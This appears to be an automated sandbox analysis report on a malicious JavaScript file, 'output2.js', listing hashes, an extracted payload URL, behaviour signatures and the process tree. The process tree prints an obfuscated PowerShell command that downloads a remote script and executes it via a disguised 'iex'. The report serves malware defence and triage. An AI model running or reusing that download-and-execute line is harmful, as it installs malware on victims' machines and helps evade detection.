Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/03/2025, 22:21
Static task
static1
Behavioral task
behavioral1
Sample
output2.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
output2.js
Resource
win10v2004-20250217-en
General
-
Target
output2.js
-
Size
19KB
-
MD5
7ad2fc01023899cc905e620961271150
-
SHA1
7cd2e2d7086d59a3697c96ccfd705707ed2c3a87
-
SHA256
b112d4db1d6ae3827653246c4f2b7413502ca1098ca2a1d00b6535b26ece0603
-
SHA512
c710a96754e9b7a29c7113643bbb4b36012cc3a9d7491fc4b26a1059804c2e3f10039af7fdcdd1cc3a00768d515ed67855b805f45a83b130fb9c28a16f38769f
-
SSDEEP
384:8R/vtrEGocUVdRtacNP8t1JaZHVI2+sRLlejNZdbjzn:uZEGon8t1CL8jlT
Malware Config
Extracted
https://pegas.durablyscrimmage.rent/awjxs.recaptcha
Signatures
-
pid Process 2976 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2976 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2988 wrote to memory of 2976 2988 wscript.exe 30 PID 2988 wrote to memory of 2976 2988 wscript.exe 30 PID 2988 wrote to memory of 2976 2988 wscript.exe 30 PID 2988 wrote to memory of 2976 2988 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\output2.js1⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -c ([System.Net.WebClient]::New().DownloadString('https://pegas.durablyscrimmage.rent/awjxs.recaptcha'))|.( (GV She*d -ValueO)[1]+(ChildItem Variable:S*ell*d).Value[13]+'x')2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-